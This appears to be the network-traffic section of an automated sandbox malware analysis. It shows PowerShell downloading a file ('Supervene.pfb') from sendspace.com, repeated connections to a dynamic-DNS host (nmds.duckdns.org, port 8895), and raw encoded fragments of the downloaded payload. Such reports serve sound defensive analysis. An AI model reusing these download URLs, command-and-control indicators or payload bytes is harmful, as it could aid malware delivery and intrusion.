                                                                                                      May 23, 2024 21:10:50.635994911 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:50.759741068 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:50.765511990 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.323029041 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:51.332338095 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.412908077 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:51.417998075 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.509823084 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:51.514926910 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.594469070 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:51.599687099 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.776268005 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:51.781609058 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.880961895 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:51.923516035 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:51.995779991 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:52.000799894 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:52.127491951 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:52.134114027 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:52.698431969 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:52.703464985 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:52.968743086 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:52.973885059 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:53.015294075 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:53.020320892 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:53.252978086 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:53.258804083 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:53.274812937 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:53.279750109 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:53.348973036 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:53.354177952 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:53.636373043 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:53.641463041 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:56.777398109 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:56.782371998 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:56.829027891 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:56.834780931 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:56.999207020 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.004215956 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.099190950 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.107028008 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.107084990 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.117801905 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.182643890 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.187649012 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.258168936 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.263200998 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.284029961 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.288925886 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.335526943 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.340500116 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.440495014 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.446379900 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.491372108 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.504851103 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.522639036 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.527803898 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.657757044 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.664874077 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.713650942 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.718780994 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.741508007 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.746434927 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.811438084 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.816513062 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:57.826086998 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:57.832169056 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:58.162807941 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:58.172792912 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:58.211922884 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:58.217060089 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:58.884027958 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:58.891442060 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.078774929 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.084080935 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.113092899 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.118289948 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.169893026 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.177135944 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.245024920 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.250297070 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.457444906 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.464704037 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.529019117 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.534039974 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.843774080 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.850018978 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:59.878009081 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:59.883224010 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:00.191504955 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:00.199115038 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:00.468034983 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:00.473186016 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:00.593063116 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:00.598054886 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.080914974 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.085956097 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.189824104 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.209445953 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.225024939 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.236380100 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.236469984 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.287324905 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.290014982 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.295001984 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.298012018 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.302891016 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.306005955 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.313188076 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.348483086 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.353511095 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.415677071 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.424468994 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.471568108 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.476707935 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.566584110 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.577116966 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.633915901 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.644437075 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.795552969 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.804193974 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.826679945 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.831631899 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.847573996 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.852598906 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.853589058 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.861675024 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.892596006 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.897536039 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.923345089 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.939935923 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.120148897 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.125509977 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.183068037 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.191293955 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.209866047 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.215188980 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.351646900 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.443205118 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.443268061 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.449712038 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.469312906 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.485785961 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.485863924 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.498383999 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.498455048 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.504719019 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.504798889 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.512104988 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.545716047 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.551884890 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.600070000 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.659605980 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.671554089 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.676740885 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.744504929 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.752548933 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.781102896 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.787873983 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.915730953 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.959481955 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.044439077 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.052169085 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.753504992 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.803374052 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.868086100 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.931461096 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.931524038 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.936490059 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.176470995 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.181531906 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.285801888 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.290781021 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.295761108 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.306139946 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.306976080 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.315789938 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.413070917 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.450511932 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.450556040 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.455461025 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.494616032 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.522414923 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.526077032 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.537151098 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.557684898 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.592417955 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.603842974 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.916475058 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.916565895 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.944701910 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.973469019 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.985155106 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:05.093074083 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:05.105305910 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:05.285842896 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:05.291013002 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:05.301457882 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:05.316572905 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:06.119277000 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:06.229104996 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:16.695615053 CEST497208895192.168.2.1012.202.180.134

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 23, 2024 21:08:08.175980091 CEST6076953192.168.2.101.1.1.1
                                                                                                      May 23, 2024 21:08:08.186875105 CEST53607691.1.1.1192.168.2.10
                                                                                                      May 23, 2024 21:08:09.114473104 CEST6471953192.168.2.101.1.1.1
                                                                                                      May 23, 2024 21:08:09.126405954 CEST53647191.1.1.1192.168.2.10
                                                                                                      May 23, 2024 21:08:48.630517960 CEST6295153192.168.2.101.1.1.1
                                                                                                      May 23, 2024 21:08:48.679580927 CEST53629511.1.1.1192.168.2.10
                                                                                                      May 23, 2024 21:08:53.038440943 CEST5572653192.168.2.101.1.1.1
                                                                                                      May 23, 2024 21:08:53.294584036 CEST53557261.1.1.1192.168.2.10

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      May 23, 2024 21:08:08.175980091 CEST192.168.2.101.1.1.10xc3f5Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:09.114473104 CEST192.168.2.101.1.1.10x356bStandard query (0)fs13n3.sendspace.comA (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:48.630517960 CEST192.168.2.101.1.1.10x5834Standard query (0)fs03n4.sendspace.comA (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:53.038440943 CEST192.168.2.101.1.1.10xf21fStandard query (0)nmds.duckdns.orgA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      May 23, 2024 21:08:08.186875105 CEST1.1.1.1192.168.2.100xc3f5No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:08.186875105 CEST1.1.1.1192.168.2.100xc3f5No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:09.126405954 CEST1.1.1.1192.168.2.100x356bNo error (0)fs13n3.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:48.679580927 CEST1.1.1.1192.168.2.100x5834No error (0)fs03n4.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:08:53.294584036 CEST1.1.1.1192.168.2.100xf21fNo error (0)nmds.duckdns.org12.202.180.134A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.sendspace.com
                                                                                                      • fs13n3.sendspace.com
                                                                                                      • fs03n4.sendspace.com

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.1049711104.21.28.804434904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:08:08 UTC174OUTGET /pro/dl/ow9148 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: www.sendspace.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-05-23 19:08:09 UTC941INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Thu, 23 May 2024 19:08:09 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=3aktu6pqgs2ccv85cuu46alob0; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Location: https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb
                                                                                                      Vary: Accept-Encoding
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eJZGl3tFzKgNKMctSWMlM9q8UjPcDm0VRr%2BXOd757LMiouyGPvOz6V%2FeTTQR91iQaCaZO0uVRUANkss8%2BMtxQgOMgczfKCv93kzTne5a5W%2F5tZvjRBTsds7WnzrWFZAwRK6K3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8887553b18fb182d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-05-23 19:08:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.104971269.31.136.574434904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:08:10 UTC232OUTGET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: fs13n3.sendspace.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-05-23 19:08:10 UTC498INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 23 May 2024 19:08:09 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 466008
                                                                                                      Last-Modified: Fri, 17 May 2024 15:09:26 GMT
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=pruh7kht80maq0grlkuo326ad7; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Content-Disposition: attachment;filename="Supervene.pfb"
                                                                                                      ETag: "66477326-71c58"
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-05-23 19:08:10 UTC15886INData Raw: 36 77 4c 70 2b 6e 45 42 6d 37 76 64 32 51 73 41 36 77 4c 62 70 2b 73 43 55 43 51 44 58 43 51 45 63 51 47 62 63 51 47 62 75 65 72 51 75 4d 31 78 41 5a 74 78 41 5a 75 42 38 64 37 30 6b 6d 35 78 41 5a 74 78 41 5a 75 42 36 54 51 6b 4b 71 4e 78 41 5a 76 72 41 6c 55 38 36 77 4a 65 6b 33 45 42 6d 37 6f 61 33 35 39 5a 63 51 47 62 36 77 4a 79 42 75 73 43 4d 39 78 78 41 5a 73 78 79 75 73 43 5a 55 33 72 41 74 66 49 69 52 51 4c 36 77 4b 79 47 33 45 42 6d 39 48 69 63 51 47 62 36 77 4a 36 49 34 50 42 42 4f 73 43 35 6c 4e 78 41 5a 75 42 2b 65 4e 6f 30 77 4a 38 79 6e 45 42 6d 2b 73 43 69 34 43 4c 52 43 51 45 36 77 4a 36 43 2b 73 43 68 36 43 4a 77 2b 73 43 78 4f 78 78 41 5a 75 42 77 30 49 4e 55 77 4a 78 41 5a 76 72 41 69 38 32 75 71 68 55 55 6f 52 78 41 5a 76 72 41 76 5a
                                                                                                      Data Ascii: 6wLp+nEBm7vd2QsA6wLbp+sCUCQDXCQEcQGbcQGbuerQuM1xAZtxAZuB8d70km5xAZtxAZuB6TQkKqNxAZvrAlU86wJek3EBm7oa359ZcQGb6wJyBusCM9xxAZsxyusCZU3rAtfIiRQL6wKyG3EBm9HicQGb6wJ6I4PBBOsC5lNxAZuB+eNo0wJ8ynEBm+sCi4CLRCQE6wJ6C+sCh6CJw+sCxOxxAZuBw0INUwJxAZvrAi82uqhUUoRxAZvrAvZ
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 68 51 34 6e 76 47 44 39 45 61 45 6d 59 2b 37 68 43 54 66 48 6e 6b 56 42 54 69 6d 38 4c 69 46 59 62 31 42 67 34 32 61 55 4c 35 70 4a 4d 2b 66 4e 6d 34 6e 4e 61 56 47 43 64 4a 46 30 71 70 33 2f 65 53 43 2b 59 34 69 61 76 68 33 2f 70 63 46 64 4e 38 74 65 37 41 65 57 74 53 43 56 49 42 6e 6d 56 48 55 77 68 44 37 30 43 5a 31 66 4d 55 4f 4e 6a 74 43 4d 71 58 56 31 73 71 4a 31 71 76 6f 51 50 66 4e 4e 31 64 4e 6a 35 59 59 47 43 4b 4b 6e 61 4e 6a 30 35 55 63 78 59 34 73 4c 6a 4c 69 32 34 31 69 54 4c 72 63 33 75 35 58 67 50 30 50 6c 30 4d 65 65 72 6c 47 45 37 61 57 49 32 53 34 31 4a 41 59 54 69 74 41 63 33 76 30 34 32 4b 75 6d 30 51 30 44 69 64 51 43 6f 62 61 31 76 6c 4d 4c 6b 4e 5a 69 54 62 38 67 65 72 4a 52 44 54 66 55 4a 71 4b 30 75 68 66 4a 46 55 72 68 38 4d 39
                                                                                                      Data Ascii: hQ4nvGD9EaEmY+7hCTfHnkVBTim8LiFYb1Bg42aUL5pJM+fNm4nNaVGCdJF0qp3/eSC+Y4iavh3/pcFdN8te7AeWtSCVIBnmVHUwhD70CZ1fMUONjtCMqXV1sqJ1qvoQPfNN1dNj5YYGCKKnaNj05UcxY4sLjLi241iTLrc3u5XgP0Pl0MeerlGE7aWI2S41JAYTitAc3v042Kum0Q0DidQCoba1vlMLkNZiTb8gerJRDTfUJqK0uhfJFUrh8M9
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 61 59 6c 2b 62 66 2f 5a 50 4c 53 6f 48 34 53 49 7a 72 67 32 73 4d 6b 50 42 62 58 77 62 6b 33 32 66 30 42 71 4b 6a 6e 32 2f 58 6e 6b 62 35 47 78 2b 49 78 54 33 37 71 47 67 2f 34 2f 31 4d 32 7a 59 72 38 76 71 42 75 34 42 76 78 39 41 33 33 68 32 44 41 63 32 6f 44 77 56 34 77 47 76 30 44 2b 78 43 48 39 2b 70 7a 57 47 7a 42 47 72 38 61 41 64 62 78 74 7a 43 43 69 6f 34 71 53 37 35 77 4a 57 4e 6a 6e 76 66 67 55 73 34 71 57 35 41 76 35 57 4e 6a 6e 4e 39 2b 42 67 77 61 59 35 50 62 32 61 65 44 4f 66 30 6e 4d 35 61 43 41 77 6f 39 6a 74 77 4b 48 79 4c 47 36 39 66 66 55 52 77 58 77 69 2b 7a 49 6a 52 57 39 52 31 41 59 63 30 35 51 36 30 67 34 6e 43 41 56 53 59 70 76 79 75 6a 4a 65 77 33 77 64 72 48 50 79 30 31 56 2f 6c 4d 4c 30 4e 65 69 54 62 7a 41 43 39 62 4d 53 5a 66
                                                                                                      Data Ascii: aYl+bf/ZPLSoH4SIzrg2sMkPBbXwbk32f0BqKjn2/Xnkb5Gx+IxT37qGg/4/1M2zYr8vqBu4Bvx9A33h2DAc2oDwV4wGv0D+xCH9+pzWGzBGr8aAdbxtzCCio4qS75wJWNjnvfgUs4qW5Av5WNjnN9+BgwaY5Pb2aeDOf0nM5aCAwo9jtwKHyLG69ffURwXwi+zIjRW9R1AYc05Q60g4nCAVSYpvyujJew3wdrHPy01V/lML0NeiTbzAC9bMSZf
